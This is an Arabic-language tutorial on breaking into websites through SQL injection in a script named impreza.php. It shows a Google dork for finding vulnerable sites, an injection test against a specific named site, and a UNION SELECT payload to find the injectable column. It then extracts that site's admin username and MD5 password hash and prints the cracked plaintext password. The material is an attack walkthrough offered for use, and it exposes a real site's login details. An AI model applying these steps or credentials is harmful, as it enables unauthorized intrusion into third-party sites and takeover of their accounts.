-. احـمـد الـعـاشـق -.
ahmed_ramy282@yahoo.com لأي استفسار دا ايميلي الشخصي
# # # #
# # # #
# ## #### ## #
## ## ###### ## ##
## ## ###### ## ##
## ## #### ## ##
### ############ ###
########################
##############
######## ########## #######
### ## ########## ## ###
### ## ########## ## ###
### # ########## # ###
### ## ######## ## ###
## # ###### # ##
## # #### # ##
## ##
الاختراق باستخدام ثغرات SQL
اليوم الثغرة الي عندنا في ملف
اسمة impreza.php
طريقة البحث عن السكربت اذهب
لل google
واكتب التالي
inurl:impreza.php?id=
ستخرج لك مواقع كثيرة مصابة
اخترنا منها هذا الموقع
http://www.polska-night.com
لاحظ هذا هو السكربت مركبة على الموقع
impreza.php
لاحظ وجدنا هنا خطا
http://www.polska-night.com/impreza.php?id=61'
اما طريقة الاستغلال جاهزة مجرد تربطة بالرابط
لاحظ معي
نبقى نقلل حتر نحصل على صفحة خالية من الاخطاء
تابع معي
اذا عدد الاعمدة هو 11
طريقة استغلال الاعمدة تابع معي
=-61+UNION SELECT 1,2,3,4,5,6,7,8,9,10,11--
هذه هي طريقة الاستغلال
-لاخراج العمود المصاب
UNION SELECT يستخدم لحصر الجداول
1,2,3,4,5,6,7,8,9,10,11 عدد العواميد
-- تكمنلة الاستغلال
تابع معي
خرج لنا العامود المصاب هو 3
تابع معي
اذا جدول from+user--
تابع معي
استغلال العامود 3
user:pawel
طيب العامود نفسة نطلع منه الباسوورد
تابع معي
الباسوررد مشفر
pass:c45871ecc6b8909060f2b9edd4ca17f6
مبروك خرج لنا اسم المدير
user:pawel
pass:c45871ecc6b8909060f2b9edd4ca17f6
pass: مشفر
دلوقتي نعمل اية يا ترا هنشوف دلوقتي اهو ..
نروح لاحد مواقع فك الهاش ندخل على هذا الموقع
http://md5.rednoize.com/
ونكتب الهاش ويخرج لنا ان وجد
الان اصبح
user:pawel
pass:polska99
مبروك تم الحصول على اليوزر والباسورد
=========================